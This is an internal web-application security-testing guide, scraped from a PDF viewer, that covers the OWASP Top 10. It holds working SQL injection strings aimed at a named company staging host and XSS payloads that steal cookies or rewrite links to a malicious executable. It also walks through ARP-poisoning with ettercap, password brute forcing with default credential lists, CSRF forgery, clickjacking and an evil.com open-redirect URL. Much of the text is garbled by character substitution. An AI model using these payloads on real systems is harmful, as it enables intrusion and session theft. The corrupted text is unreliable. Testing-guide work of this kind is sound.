Security Testing by OWASP Top 10

8/13/2019 Security Testing by OWASP Top 10

http://slidepdf.com/reader/full/security-testing-by-owasp-top-10 1/30



Document Management

ConfidentialityThis is a Levi9 Restricted document. According to the Standards of Business Conduct, thisdocument may not be shared outside Levi9 but may be published on the Levi9 ntranet!ithout further restrictions.

This document may be shared !ith the customer, if an appropriate agreement forprofessional services e"ists.

Distribution List

To Company / Role ction! Due Date Telep"one / e#mail

* Action: Approve, Review, Inform, Other (Please specify)

Document $istory

%ersion Description Date ut"or

References

Source Date ut"or

#ersion $.% &rint 'ate $( )an *%$+ &age * of %



Table of contents

$ About - AS& Top $%.........................................................................................................+

$.$ A$ n/ection................................................................................................................... +

$.$.$ 0anual inserting S1L n/ection string in the 2RL and fields...................................+

$.$.* Automated inserting S1L n/ection strings in the input fields..................................(

$.* A* Cross3Site Scripting 45SS6.......................................................................................9

$.*.$ Reflected Cross Site Scripting 45SS6......................................................................9

$.*.* Stored Cross Site Scripting 45SS6..........................................................................9

Session........................................................................................................................ $%

$.*. 7"amples for &ersistent 5SS Attac8.....................................................................$%

$. A Bro8en Authentication and Session 0anagement..................................................$

$. .$ 0anual testing of Bro8en Authentication and Session 0anagement....................$

$. .* Automated testing of Bro8en Authentication and Session 0anagement...............$

Logout and Bro!ser Cache 0anagement............................................................................$

$.+ A+ nsecure 'irect -b/ect References........................................................................ $:

Attac8s on application platform ....................................................................................$9

Attac8s on other systems ............................................................................................$9

$.( A( Cross3Site Re;uest <orgery 4CSR<6......................................................................$9

Clic8/ac8ing Test &age ....................................................................................................*%

$.= A= Security 0isconfiguration.......................................................................................*$

$. A nsecure Cryptographic Storage.............................................................................*$

$.: A: <ailure to Restrict 2RL Access..............................................................................**

$.9 A9 nsufficient Transport Layer &rotection...................................................................**

$.$% A$% 2nvalidated Redirects and <or!ards................................................................ *+

* 'amn #ulnerable eb App 4'# A6..................................................................................*(

Appendi"............................................................................................................................ *:

+ Bibliography....................................................................................................................... %

#ersion $.% &rint 'ate $( )an *%$+ &age of %



1 bout O& S' Top 10

The - AS& Top $% eb Application Security Ris8s for *%$% are>

• A$> n/ection• A*> Cross3Site Scripting 45SS6• A > Bro8en Authentication and Session 0anagement• A+> nsecure 'irect -b/ect References• A(> Cross3Site Re;uest <orgery 4CSR<6• A=> Security 0isconfiguration• A > nsecure Cryptographic Storage• A:> <ailure to Restrict 2RL Access• A9> nsufficient Transport Layer &rotection• A$%> 2nvalidated Redirects and <or!ards

The list above represents the most !idespread vulnerabilities for *%$%. Testing !ebapplication against those - AS& Top $% points could be performed manually or usingpenetration tools or scanners. t is the best to use combination of manual testing and usingsome of automated testing tools. There are a lot of free automated testing tools. This is thelist of most popular>

•

ebScarab 4!eb scanner6 3 ebScarab is a frame!or8 for analy?ing applicationsthat communicate using the @TT& and @TT&S protocols.• Bac8Trac8( 4distribution based on the 'ebian 2 Linu" distribution aimed at digital

forensics and penetration testing use6• - AS& Live C' 4collects some of the best open source security pro/ects in a single

environment 4Linu"66.• - AS& DA& 4penetration testing tool for finding vulnerabilities in !eb applications6

1(1 1 )n*ectionn/ection fla!s, such as S1L, -S, and L'A& in/ection, occur !hen untrusted data is sent to

an interpreter as part of a command or ;uery. The attac8erEs hostile data can tric8 theinterpreter into e"ecuting unintended commands or accessing unauthori?ed data.#ulnerability for in/ection could be tested on t!o !ays, using penetration tool or manually byinserting S1L n/ection string in the 2RL as parameter or by inserting in input or te"t field.There are a lot of S1L n/ection strings !hich can be used for attac8.

1(1(1 Manual inserting S+L )n*ection string in t"e ,RL and fields

Perform String SQL Injection

<or e"ample>S7L7CT F <R-0 2sers @7R7 2sernameGH$H -R H$H G H$H A ' &ass!ordGH$H -R H$H G H$H

http> phase*relatieplanet.staging.levi9.com rdIusernameG$HJ*%orJ*%H$HJ*%GJ*%H$Kpass!ordG$HJ*%or J*%H$HJ*%GJ*%H$ http> phase*relatieplanet.staging.levi9.com rdIuserGF

#ersion $.% &rint 'ate $( )an *%$+ &age + of %

http://phase2relatieplanet.staging.levi9.com/rd?username=1%27%20or%20%271%27%20=%20%271&password=1%27%20or%20%271%27%20=%20%271


http://phase2relatieplanet.staging.levi9.com/rd?user=*



http://phase2relatieplanet.staging.levi9.com/rd?user=*



7"ample $nsert follo!ing S1L in/ection strings in username and pass!ord field and submit it. orE$E G $

H or HaHGHaf application is vulnerable for S1L in/ection, attac8er !ill be logged as first user !ho e"ists inthe database.7"ample *nsert follo!ing S1L in/ection strings in username field> orE$E G $M33nsert anything in pass!ord fieldIidG3*( order by $%

1(1(- utomated inserting S+L )n*ection strings in t"e input fields

<or automated testing S1L in/ection one of the best tools is 0antra. 0antra is one of themany Bac8Trac8( penetration tools. Also, there is a possibility to install 0antra asstandalone application 4!ithout Bac8Trac8(6.

Start 0antra standalone application, select Tools Application Auditing, and choose NS1Ln/ect 0eO. -pen sidebar and select !hich S1L in/ection sting you !ant to test on specificinput field. Start test by pressing N7"ecuteO button. There is option to test all forms on thepage !ith all attac8s or top attac8 by pressing NTest all forms !ith all attac8sO or NTest allforms !ith top attac8sO button. 0antra offer possibility to add some custom S1L in/ectionstrings. This can be done in -ptions section. Also, it is possible to import S1L in/ectionstrings from ."ml file.

#ersion $.% &rint 'ate $( )an *%$+ &age ( of %



#ersion $.% &rint 'ate $( )an *%$+ &age = of %



XML-Injection

50L in/ection is possible only if application relies on 50L 4stores information in an 50L'B for instance6.Let us suppose !e have the follo!ing "ml DB file (information is stored in an XML)

<?xml version="1.0" encoding="ISO??8859??1"?><users><user><username>gandalf< username><!ass ord>#c$< !ass ord><userid>0< userid><mail>gandalf%middleear&'.com< mail>< user><user><username>S&efan0< username><!ass ord> 1s$c< !ass ord><userid>500< userid><mail>S&efan0% '(sec.'mm< mail>< user>< users>Tool for testing 50L in/ection> 5&ath Blind 7"plorer 4 http> code.google.com p "path3blind3e"plorer do!nloads list )

Blind SQL injection

eb site might be vulnerable to blind S1L in/ection if id of the page is e"posed in the 2RL.

Blind S1L n/ection is used !hen a !eb application is vulnerable to an S1L in/ection but theresults of the in/ection are not visible to the attac8er. The page !ith the vulnerability may not

#ersion $.% &rint 'ate $( )an *%$+ &age of %

http://code.google.com/p/xpath-blind-explorer/downloads/list






be one that displays data but !ill display differently depending on the results of a logicalstatement in/ected into the legitimate S1L statement called for that page. This type of attac8can become time3intensive because a ne! statement must be crafted for each bit recovered.There are several tools that can automate these attac8s once the location of the vulnerability

and the target information has been established.<irst thing is to chec8 is targeted page !ith id in the 2RL vulnerable or not>

$. o to the targeted page i.e. http> !!!.fa8eboo8revie!er.com sho!Revie!.phpI'G( ,

<ollo!ing query ill !e e"ecuted# SELECT * FROM bookreviews WHERE ID ='5';

*. <rom !hich it !ould populate the revie! page !ith data from the revie! !ith ' G (,stored in the table boo8revie!s. The ;uery happens completely on the serverM theuser does not 8no! the names of the database, table, or fields, nor does the user

8no! the ;uery string. The user only sees that the above 2RL returns a boo8 revie!. A hac8er can load the 2RLs http> !!!.fa8eboo8revie!er.com sho!Revie!.phpI'G( A ' $G$ and http> !!!.fa8eboo8revie!er.com sho!Revie!.phpI'G( A ' $G* , !hich may result in ;ueries>

SELECT * FROM bookreviews WHERE ID = '5' AND '1'='1';SELECT * FROM bookreviews WHERE ID = '5' AND '1'=' ';

respectively. f the original revie! loads !ith the P$G$P 2RL and a blan8 or error pageis returned from the P$G*P 2RL, the site is li8ely vulnerable to a S1L in/ection attac8.The hac8er may proceed !ith this ;uery string designed to reveal the version numberof 0yS1L running on the server>

http> !!!.fa8eboo8revie!er.com sho!Revie!.phpI 'G( A ' substring4QQversion,$,$6G+, !hich !ould sho! the boo8 revie! on a server running 0yS1L + and a blan8or error page other!ise. The hac8er can continue to use code !ithin ;uery strings toglean more information from the server until another avenue of attac8 is discovered orhis or her goals are achieved.

So, the point is that !eb application does not return to attac8er any information aftere"ecuting S1L ;ueries.

Blind S1L in/ection is called NblindO because attac8er do not have any info about applicationand database, and attac8er try to guess user name and pass!ord by inserting maliciouscode using information obtained from error messages. $

$nion Query SQL Injection

$ Reference> http> en.!i8ipedia.org !i8i S1L in/ection M http> !!!.securiteam.com securityrevie!s ('&% $& =7.html

#ersion $.% &rint 'ate $( )an *%$+ &age : of %

http://www.fakebookreviewer.com/showReview.php?ID=5


http://www.fakebookreviewer.com/showReview.php?ID=5%C2%A0AND%C2%A01=1




http://en.wikipedia.org/wiki/MySQL

http://www.fakebookreviewer.com/showReview.php?ID=5%C2%A0AND%C2%A0substring(@@version,1,1)=4


http://en.wikipedia.org/wiki/SQL_injection


http://www.securiteam.com/securityreviews/5DP0N1P76E.html







http://en.wikipedia.org/wiki/MySQL







!""#$%%www&e ()# e&+o)%#ro,-+"&#!#.i,=1/ ORDER 0 1/22

#3"!o4 s )(#&#3 2v 22-r = !""#$%%1/&1&1&66%,vw(%v- 4er(bi i"ies%s i22-ser2(7e4"=S8LMA9 22,e (3=1 22"i)eo-"=15 22re"ries=22kee#2( ive 22"!re(,s=5 22e"( 22b("+! 22,b)s=M3S8L 22os=Li4- 22 eve =522risk=6 22b(44er 22is2,b( 22,bs 22"(b es 22"e+!4i -e=0E:ST

1(- - Cross#Site Scripting . SS

1(-(1 Reflected Cross Site Scripting . SS

1.2.1.1 an!al testin" of #ross$%ite %criptin" (&%%)

0anual testing of Cross3Site Scripting means that every input or te"t field or 2RL on !ebapplication should be tested for inserting some malicious script. Reflected Cross3siteScripting 45SS6 is another name for non3persistent 5SS, !here the attac8 doesnHt load !iththe vulnerable !eb application but is originated by the victim loading the offending 2R .

n case of on3&ersistent attac8 or Reflected Cross Site Scripting, it re;uires a user to visitthe specially crafted lin8 by the attac8er. hen the user visits the lin8, the crafted code !illget e"ecuted by the userEs bro!ser.

<or e"ample>

Attac8er created 2RL and sends it to the victim 4i.e. http> visitme.com 6, !hen victim clic8 onthis lin8 malicious code !ill be e"ecuted and attac8er can steal session from victim.

<or e"ample>

http> phase*relatieplanet.staging.levi9.com rdIuserG script alert4$* 6 script

http> phase*relatieplanet.staging.levi9.com rdIuserG script !indo!.onload G function46 Uvar AllLin8sGdocument.get7lementsByTag ame4PaP6MAllLin8sV%W.hrefGPhttp> bade"ample.com malicious.e"ePM X script

7nter follo!ing /avascript code in the input field> script alert4document.coo8ie6M script and submit itto the server.This is a fe! e"amples of inserting 5SS into 2RL *

http> phase*relatieplanet.staging.levi9.com rd searchI

actionGsounde"KfirstnameG script alert4document.coo8ie6 scripthttp> phase*relatieplanet.staging.levi9.com rd ?oe8en uitgebreid3?oe8en IactionG script alert4document.coo8ie6 script

1(-(- Stored Cross Site Scripting . SS

Stored Cross3site Scripting 45SS6 is the most dangerous type of Cross Site Scripting. ebapplications that allo! users to store data are potentially e"posed to this type of attac8. Thischapter illustrates e"amples of stored cross site scripting in/ection and related e"ploitationscenarios.

* Reference> http> theinsider.deep3ice.com te"ts "ss e"posed.t"t

#ersion $.% &rint 'ate $( )an *%$+ &age 9 of %

http://visitme.com/

http://phase2relatieplanet.staging.levi9.com/rd?user=%3Cscript%3Ealert(123)%3C/script

http://phase2relatieplanet.staging.levi9.com/rd/search?action=soundex&firstname=%3Cscript%3Ealert(document.cookie)%3C/script


http://phase2relatieplanet.staging.levi9.com/rd/zoeken/uitgebreid-zoeken/?action=%3Cscript%3Ealert(document.cookie)%3C/script


http://visitme.com/

http://phase2relatieplanet.staging.levi9.com/rd?user=%3Cscript%3Ealert(123)%3C/script







n case of persistent attac8, the code in/ected by the attac8er !ill be stored in a secondarystorage device 4mostly on a database6.

Stored 5SS does not need a malicious lin8 to be e"ploited. A successful e"ploitation occurs

!hen a user visits a page !ith a stored 5SS. The follo!ing phases relate to a typical stored5SS attac8 scenario>

Attac8er stores malicious code into the vulnerable page2ser authenticates in the application

2ser visits vulnerable page

0alicious code is e"ecuted by the userHs bro!ser

<or e"ample>

Attac8er inserts some malicious code on the vulnerable page and save this. This maliciouscode is stored in the database. hen some user visit attac8erEs page malicious code !ill bee"ecuted.

Session

@TT& protocol is a stateless protocol, !hich means, it !onEt maintain any state !ith regard tothe re;uest and response. All re;uest and response are independent of each other. But mostof the !eb applications donEt need this. -nce the user has authenticated himself, the !ebserver should not as8 the username pass!ord for the ne"t re;uest from the user. To do this,they need to maintain some 8ind of states bet!een the !eb3bro!ser and !eb3server !hich isdone through the NSessionsO.

hen the user login for the first time, a session ' !ill be created by the !eb server and it!ill be sent to the !eb3bro!ser as Ncoo8ieO. The entire sub3se;uent re;uest to the !ebserver !ill be based on the Nsession idO in the coo8ie.

1(-( 23amples for 'ersistent SS ttac4

This sample !eb application !eEve given belo! that demonstrates the persistent 5SS attac8does the follo!ing>

o to the some page !ith input or te"t fields, enter malicious code and save. 0alicious code sno! stored in the database.

#ersion $.% &rint 'ate $( )an *%$+ &age $% of %



1.2.'.1 A!tomate testin" of #ross$%ite %criptin" (&%%)

Run 0antra N5SS meO tool in standalone application or run it in Bac8Trac8(. Select fields you!ant to test choose 5SS string and press 7"ecute button or /ust press NTest all forms !ith allattac8sO button to test all forms on the page !ith all 5SS strings defined in -ptions section. tis possible to add more 5SS strings in -ptions section.

#ersion $.% &rint 'ate $( )an *%$+ &age $$ of %



#ersion $.% &rint 'ate $( )an *%$+ &age $* of %



D%M !ased XSS fault

The '-0, or 'ocument -b/ect 0odel is the structural format that may be used to representdocuments in the bro!ser. The '-0 enables dynamic scripts such as )avaScript to

reference components of the document such as a form field or a session coo8ie.hen attac&er enter some img tag in t'e in ut field and su!mit t'at scri t ifa lication is not secure t'an t'ere is ossi!ility to deface e!site* (layout of t'e

age ill !e !ro&en)

<or e"ample> find 2RL that point to the some image 4easiest !ay is to select image and useNcopy lin8 locationO6+img src, 'tt # ./0*.1*2*03/#4242 relatie lanet mem!erimages t'!.*5P6 enter in t'e in ut field and su!mit*

1( 5ro4en ut"entication and Session Management

1( (1 Manual testing of 5ro4en ut"entication and Session Management Authentication and session management includes all aspects of handling user authenticationand managing active sessions. Authentication is a critical aspect of this process, but evensolid authentication mechanisms can be undermined by fla!ed credential managementfunctions, including pass!ord change, forgot my pass!ordM remember my pass!ord,account update, and other related functions. Because N!al8 byO attac8s are li8ely for many!eb applications, all account management functions should re;uire reauthentication even ifthe user has a valid session id.

7"ample>

SiteEs user should not be able to see protected content of the site if he she is not authori?ed

to see it. So, user passes authentication, but if he she is not authori?ed to see something onthe site, application should not allo! him her to see this content.

2ser A have permission to see some image or document, but user B do not have thatpermission 4not logged in6, so if user A send 2RL !ith session ' to user B, he she shouldnot be able to see it.

hat should be chec8edI This is the list>

$. Are credentials al!ays protected !hen stored using hashing or encryptionI*. Can credentials be guessed or over!ritten through !ea8 account management

functions 4e.g., account creation, change pass!ord, recover pass!ord, !ea8 session

's6I. Are session 's e"posed in the 2RL 4e.g., 2RL re!riting6I

+. Are session 's vulnerable to session fi"ation attac8sI

(. 'o session 's timeout and can users log outI

=. Are session 's rotated after successful loginI

. Are pass!ords, session 's, and other credentials sent only over TLS connectionsI

1( (- utomated testing of 5ro4en ut"entication and Session Management

<rom main menu select follo!ing>

#ersion $.% &rint 'ate $( )an *%$+ &age $ of %



Bac8Trac8 &rivilege 7scalation Sniffers et!or8 Sniffers ettercap3gt8• <ind etter.conf file, this file is located in etc folder YYetcYetter.conf. 7dit it, find Linu"

section for NiptablesO in this file and remove sign Z in those t!o lines>

Zredir command on G Piptables 3t nat 3A &R7R-2T 3i Jiface 3p tcp 33dportJport 3/ R7' R7CT 33to3port JrportP

Zredir command off G Piptables 3t nat 3' &R7R-2T 3i Jiface 3p tcp 33dportJport 3/ R7' R7CT 33to3port JrportP

• -pen ettercap3gt8, Clic8 on Sniff, choose 2nified sniffing, select et!or8 interfacefrom the list 4e.g. eth$6 and clic8 -[

• o to the @osts and clic8 on Scan for hosts, no! go to the @ost list select !antedhost from the list ad clic8 on Add to Target $, select another and clic8 on Add totarget *

• Choose 0itim from menu and clic8 on Arp poisoning, select Sniff remote

connections.Choose Start and clic8 on Start sniffing. To chec8 if the poisoning had success go to the&lugins and open 0anage the plugins

<rom main menu select follo!ing>

Bac8Trac8 &rivilege 7scalation &ass!ord Atac8s gt83hydra

o!, -pen bro!ser on the victim machine 4machine from the host list that !as poisoned6

Default or guessa!le (dictionary) user account

Try the follo!ing usernames 3 PadminP, PadministratorP, ProotP, PsystemP, PguestP, PoperatorP,or PsuperP. These are popular among system administrators and are often used. Additionallyyou could try P;aP, PtestP, Ptest$P, PtestingP and similar names. Attempt any combination of theabove in both the username and the pass!ord fields. f the application is vulnerable tousername enumeration, and you successfully manage to identify any of the aboveusernames, attempt pass!ords in a similar manner. n addition try an empty pass!ord orone of the follo!ing Ppass!ordP, Ppass$* P, Ppass!ord$* P, PadminP, or PguestP !ith theabove accounts or any other enumerated accounts. <urther permutations of the above canalso be attempted. f these pass!ords fail, it may be !orth using a common username andpass!ord list and attempting multiple re;uests against the application. This can, of course,be scripted to save time.

Brute 7orce

'ictionary Attac8

'ictionary3based attac8s consist of automated scripts and tools that !ill try to guessusernames and pass!ords from a dictionary file. A dictionary file can be tuned and compiledto cover !ords probably used by the o!ner of the account that a malicious user is going toattac8. The attac8er can gather information 4via active passive reconnaissance, competitiveintelligence, dumpster diving, social engineering6 to understand the user, or build a list of alluni;ue !ords available on the !ebsite.

Reference> https> !!!.o!asp.org inde".php Testing for 'efault or uessable 2ser Account J*:- AS&3AT3%% J*9

#ersion $.% &rint 'ate $( )an *%$+ &age $+ of %

https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_(OWASP-AT-003)






Start - AS& DA& tool

Select Brute <orce, select site and choose directory3list file from dropdo!n bo" and press&lay. t is possible to create your o!n directory3list

By assing aut'entication sc'ema• 'irect page re;uest 4forced bro!sing6• &arameter 0odification• Session ' &rediction

Direct page re6uest .forced browsing

f a !eb application implements access control only on the login page, the authenticationschema could be bypassed. <or e"ample, if a user directly re;uests a different page via

forced bro!sing, that page may not chec8 the credentials of the user before granting access. Attempt to directly access a protected page through the address bar in your bro!ser to testusing this method.

Try !ith this> http> somesite.com users Administrator

'arameter Modification

f user is not authenticated parameter in the 2RL !ill be> http> somesite homepage./spIauthenticatedGno

Type this in bro!ser>

http> somesite homepage./spI authenticatedGyes

Session )D 'rediction

0any !eb applications manage authentication using session identification values 4S7SS -'6. Therefore, if session ' generation is predictable, a malicious user could be able to finda valid session ' and gain unauthori?ed access to the application, impersonating apreviously authenticated user. n the follo!ing figure, values inside coo8ies increase linearly,so it could be easy for an attac8er to guess a valid session '.

#ersion $.% &rint 'ate $( )an *%$+ &age $( of %



This is not correct, distribution of coo8ies over time must be dispersed, if not, there ispossibility t'at attac&er redict session ID*

To chec8 this, start ebScarab, open Session ID 8nalysis ta! Select 9equest enternum!er of Sam les and ress :est* ;lic& on 7etc' !utton and after t'at go to t'e

8nalysis ta!* Select session identifier* 9e eat t'is action for different requests inorder to get diagram for coo&ie <alues o<er time*

#ersion $.% &rint 'ate $( )an *%$+ &age $= of %



Logout and Bro ser ;ac'e Management

n this testcase, !e chec8 that the logout function is properly implemented, and that it is notpossible to NreuseO a session after logout. e also chec8 that the application automaticallylogs out a user !hen that user has been idle for a certain amount of time, and that nosensitive data remains stored in the bro!ser cache.%nly one coo&ie e"ists to store session info

Chec8 follo!ing #• sessions ' K coo8ies• a coo8ie is data stored on the client 4recommendation is session coo8ie instead of

persistent coo8ie6• !hen the bro!ser is closed, temporary coo8ies 4session coo8ies6 should be erased• a sessionHs data is stored on the server 4only $ session per client6• the only data the client stores is a coo8ie holding a uni;ue session '

• on each page re;uest, the client sends its session ' coo8ie, and the server uses thisto find and retrieve the clientHs session data

;'ec& reset ass ord

'assword Reset

The first step is to chec8 !hether secret ;uestions are used. Sending the pass!ord 4or apass!ord reset lin86 to the user email address !ithout first as8ing for a secret ;uestion

means relying $%%J on the security of that email address, !hich is not suitable if theapplication needs a high level of security.

• Chec8 are there multiple ;uestions offeredI• Chec8 does the pass!ord reset allo! unlimited attemptsI• Chec8 does pass!ord3reset tool display the old pass!ordI

• Chec8 does it email the pass!ord to some pre3defined email addressI• 'isplay a Captcha code, after successful verification of username and or Security

1uestion•

Send a lin8 to the userEs registered email address. The lin8 should have randomto8en associated !ith it.• :'e lin& s'ould !e s'ort-li<ed one time use only and SSL ena!led*

• %nce t'e user=s resets t'e ass ord t'e lin& s'ould no longer !e usa!le*

'assword Remember

f pass!ord is stored in a permanent coo8ie than the pass!ord must be hashed encryptedand not sent in the clear.

;'ec& if t'e session is refres'ed

#ersion $.% &rint 'ate $( )an *%$+ &age $ of %



After 8illing bro!ser or deleting coo8ies and cache in bro!ser, current session must beterminated, if not t'an e 'a<e security issue*

1(7 7 )nsecure Direct Ob*ect References

The best !ay to find out if an application is vulnerable to insecure direct ob/ect references isto verify that all ob/ect references have appropriate defenses. To achieve this, consider>

$. <or direct references to restricted resources, the application needs to verify the useris authori?ed to access the e"act resource they have re;uested.

*. f the reference is an indirect reference, the mapping to the direct reference must belimited to values authori?ed for the current user.

<or e"ample>

2ser A is authenticated on the site but doesnEt have permission to see some parts of the site.So, !hen user A try to access to some forbidden area, application must chec8 is he sheauthori?ed to see hidden content. f he she is not authori?ed, application must disenablehim her to see hidden content.

Attac8er, !ho is an authori?ed system user, simply changes a parameter value that directlyrefers to a system ob/ect to another ob/ect the user isnEt authori?ed for. This behavior mustbe disenabling.

The best !ay for testing this type of vulnerability is manually testing or code revie!.

Im ro er Limitation of a Pat'name to a 9estricted Directory (>Pat' :ra<ersal>)

Start - AS& DA& tool (ma&e sure t'at ro"y is configured in t'e !ro ser)* ?a<igatet'roug' site all traffic goes <ia ro"y and %@8SP A8P interce ts all requests andres onses* 7rom t'e tree select 'ic' age and 'ic' met'od you ant to test (6 :or P%S:)* 7rom t'e 9equest ta! select $9L rig't clic& and clic& at C7u ***E 7rom7u ;ategory c'oose Pat' :ra<ersal and clic& at 7u !utton to start testing*

#ersion $.% &rint 'ate $( )an *%$+ &age $: of %



$nrestricted $ load of 7ile it' Dangerous :y e

The e! a lication allo s t'e attac&er to u load or transfer files of dangerous ty es

t'at can !e automatically rocessed it'in t'e roduct>s en<ironment*

ttac4s on application platform

Chec8 follo!ing>• 2pload ./sp file into !eb tree 3 /sp code e"ecuted as !eb user• 2pload .gif to be resi?ed 3 image library fla! e"ploited• 2pload huge files 3 file space denial of service• 2pload file using malicious path or name 3 over!rite critical file• 2pload file containing personal data 3 other users access it• 2pload file containing PtagsP 3 tags get e"ecuted as part of being PincludedP in a !eb

page

ttac4s on ot"er systems

Chec8 follo!ing>• 2pload .e"e file into !eb tree 3 victims do!nload tro/aned e"ecutable• 2pload virus infected file 3 victimsH machines infected• 2pload .html file containing script 3 victim e"periences Cross3site Scripting 45SS6

1(8 8 Cross#Site Re6uest 9orgery .CSR9Besides 5SS and n/ection, CSR< is most common vulnerability on the !eb sites. Consideranyone !ho can tric8 your users into submitting a re;uest to your !ebsite. Any !ebsite orother @T0L feed that your user access could do this.

<or e"ample> Attac8er creates forged @TT& re;uests and tric8s a victim into submitting themvia image tags, 5SS, or numerous other techni;ues. f the user is authenticated, the attac8succeeds.

@o! to create forged page !ith image tagI

<irst, do!nload &i\ata csrf tool from http> code.google.com p pinata3csrf3tool do!nloads list$. nstall &ython

*. 2n?ip pi\ata tool

. Start some scanner tool 4 ebScarab, &aros or something similar6. ith this toolattac8er intercept @TT& 7T re;uest and this re;uest !ill be used for creating forgedpage !ith img tag.

+. o to the vulnerable site and perform some action 4 n this case attac8er6

(. Copy @TT& re;uest

=. &aste it to CSR<Body.t"t file

#ersion $.% &rint 'ate $( )an *%$+ &age $9 of %

http://code.google.com/p/pinata-csrf-tool/downloads/list

http://code.google.com/p/pinata-csrf-tool/downloads/list



. Run command line and go to the &inata folder and run pi\ata.py file

:. Chec8 folder !here you un?ip &inata tool, there should be created an .html file

9. This html file has in the body img tag !ith malicious code in it.

$%. Run this html code in ne! bro!ser, if application is not safe every time !hen user

reload page or clic8 on lin8 !ho leads to the malicious page code !ill be e"ecuted,because bro!ser automatically start loading images on the page.

$$. f application is safe related CSR< attac8 nothing !ill happen.

;lic&jac&ing

Clic4*ac4ing Test 'age

To test !hether a site is vulnerable to clic8/ac8ing, create an @T0L page similar to thefollo!ing, changing the 2RL highlighted in R7' to point to your target site>

<'&ml><'ead><&i&le>)lic*+ac* &es& !age< &i&le>< 'ead><,od(><!>-ou ve ,een clic*+ac*ed#< !><iframe sand,ox="allo /scri!&s allo /forms" src=" '&&! local'os& 8080 "s&(le=" id&' 100 2'eig'& 90 ">< iframe>< ,od(>< '&ml>

f you see the te"t N]ouEve been clic8/ac8ed^O at the top of the page, your site is vulnerable.ith a clic8/ac8ing defense script installed, your site should brea8 out of the site that is

#ersion $.% &rint 'ate $( )an *%$+ &age *% of %

https://www.codemagi.com/blog/post/194






framing it and that te"t !ill not be displayed. f the userEs bro!ser has )avascript turned off,the target site should not display at all.

1(: : Security Misconfiguration:esting for F::P Met'ods and XS:

'irectory listing is not disabled on your server. Attac8er discovers he can find all files on yourserver by simply listing the directories. Attac8er finds and do!nloads all your compiled )avaclasses, !hich he reverses to get all your custom code. @e then find a serious access controlfla! in your application.

The methods that should be disabled are the follo!ing>

•

&2T> This method allo!s a client to upload ne! files on the !eb server. An attac8ercan e"ploit it by uploading malicious files 4e.g.> an asp file that e"ecutes commandsby invo8ing cmd.e"e6, or by simply using the victimHs server as a file repository

• '7L7T7> This method allo!s a client to delete a file on the !eb server. An attac8ercan e"ploit it as a very simple and direct !ay to deface a !eb site or to mount a 'oSattac8

• C- 7CT> This method could allo! a client to use the !eb server as a pro"y• TRAC7> This method simply echoes bac8 to the client !hatever string has been sent

to the server, and is used mainly for debugging purposes. This method, originallyassumed harmless, can be used to mount an attac8 8no!n as Cross Site Tracing,!hich has been discovered by )eremiah rossman 4see lin8s at the bottom of the

page6

1(; ; )nsecure Cryptograp"ic Storage

<or e"ample, pass!ords, credit cards, health records, and personal information should beencrypted. <or all such data, ensure>

$. t is encrypted every!here it is stored long term, particularly in bac8ups of this data.*. -nly authori?ed users can access decrypted copies of the data 4i.e., access control _

See A+ and A:6.

. A strong standard encryption algorithm is used.

+. A strong 8ey is generated, protected from unauthori?ed access, and 8ey change isplanned for.

;'ec& ass ord 'as'ed

$. @o! to chec8 are pass!ords, credit cards and other personal data properly stored inthe database _ go to the database and find table !ith pass!ords, credit cards andother personal data.

*. Copy hash value

. Start some program i.e. 4 http> !!!.sha$3loo8up.com 6 to search reverse value fromcopied hash value.

#ersion $.% &rint 'ate $( )an *%$+ &age *$ of %

http://www.sha1-lookup.com/

http://www.sha1-lookup.com/



+. f strong encryption algorithm is used, attac8er should not be able to see reversevalue from copied hash value.

1(< < 9ailure to Restrict ,RL ccess Attac8er, !ho is an authori?ed system user, simply changes the 2RL to a privileged page. saccess grantedI Anonymous users could access private pages that arenEt protected.

f user has no privilege to see some pages on the site, system should prevent him her to dothat by typing 2RL address of that page in bro!ser.

1(= = )nsufficient Transport Layer 'rotectionTransport Layer Security 4TLS6 and its predecessor, Secure Soc8ets Layer 4SSL6, are

cryptographic protocols that provide communication security over the nternet. TLS and SSLencrypt the segments of net!or8 connections at the Application Layer for the TransportLayer, using asymmetric cryptography for 8ey e"change, symmetric encryption forconfidentiality, and message authentication codes for message integrity.

SSL 8lgorit'ms

<or e"ample>

To chec8 SSL algorithms on server should be used NsslscanO tool !hich is part of Bac8Trac8distribution.

•

Run Bac8Trac8(• <rom 0ain menu select nformation athering et!or8 Analysis Service

<ingerprinting sslscan• 7nter server & address you !ant to test and press enter

#ersion $.% &rint 'ate $( )an *%$+ &age ** of %



This tool help testers to chec8 !hich if !eb server run latest SSL version 4version 6 orTLS version $. There are still some outdated servers running SSL version *.

nformation athering et!or8 Analysis dentify Live @osts nmap

SSL Gey Lengt'suidelines f or SSL Gey lengt's are resented in ta!le + belo! #

Certificate e3piry date Minimum RS public 4ey lengt"

On or before $ st 'ecember *%$ $%*+

fter $ st 'ecember *%$ *%+:

Ste s to c'ec& 9S8 Pu!lic Gey#• Run Bac8Trac8(• <rom 0ain menu select nformation athering et!or8 Analysis Service


Digital ;ertificate Halidity

Steps to chec8 RSA &ublic [ey>• Run Bac8Trac8(• <rom 0ain menu select nformation athering et!or8 Analysis Service


+ http> ne!s.netcraft.com archives *%$* %9 $% minimum3rsa3public38ey3lengths3guidelines3or3rules.html




1(10 8.2 $n<alidated 9edirects and 7or ardsf application has redirect page or application uses for!ard to route re;uests bet!een

different parts of the site, that is potentialy dangerous, because attac8er may e"ploit redirector for!ard to redirect users to the some malicious site by entering address of malicious sitein the 2RL address.

<or e"ample>http> !!!.e"ample.com redirect./spIurlGevil.com

Create use a spider to cra!l your o!n site

Loo8 at the logs for redirects

%%3series statuses

%*K %

%*Gold3schoolpagemoved

% Gproper redirection.

o Try to change the 2RL by hand.

o Try to brute3force change it via an @TT& re3!riter.

o f either !or8s, you have a vulnerability.

o 0odify the page to hard3code the destination.

o f that isnHt possible, only allo! the user to choose from a list.

#ersion $.% &rint 'ate $( )an *%$+ &age *+ of %

http://www.example.com/redirect.jsp?url=evil.com

http://www.example.com/redirect.jsp?url=evil.com



- Damn %ulnerable &eb pp .D%&'amn #ulnerable eb App 4'# A6 is a &@& 0yS1L !eb application that is damnvulnerable. ts main goals are to be an aid for security professionals to test their s8ills and

tools in a legal environment, help !eb developers better understand the processes ofsecuring !eb applications and aid teachers students to teach learn !eb application securityin a class room environment.

This !eb application is designed only for security testing purposes.

'o!nload and install 5A0&& from http> !!!.apachefriends.org en "ampp3!indo!s.html

'o!nload '# A from http> !!!.dv!a.co.u8

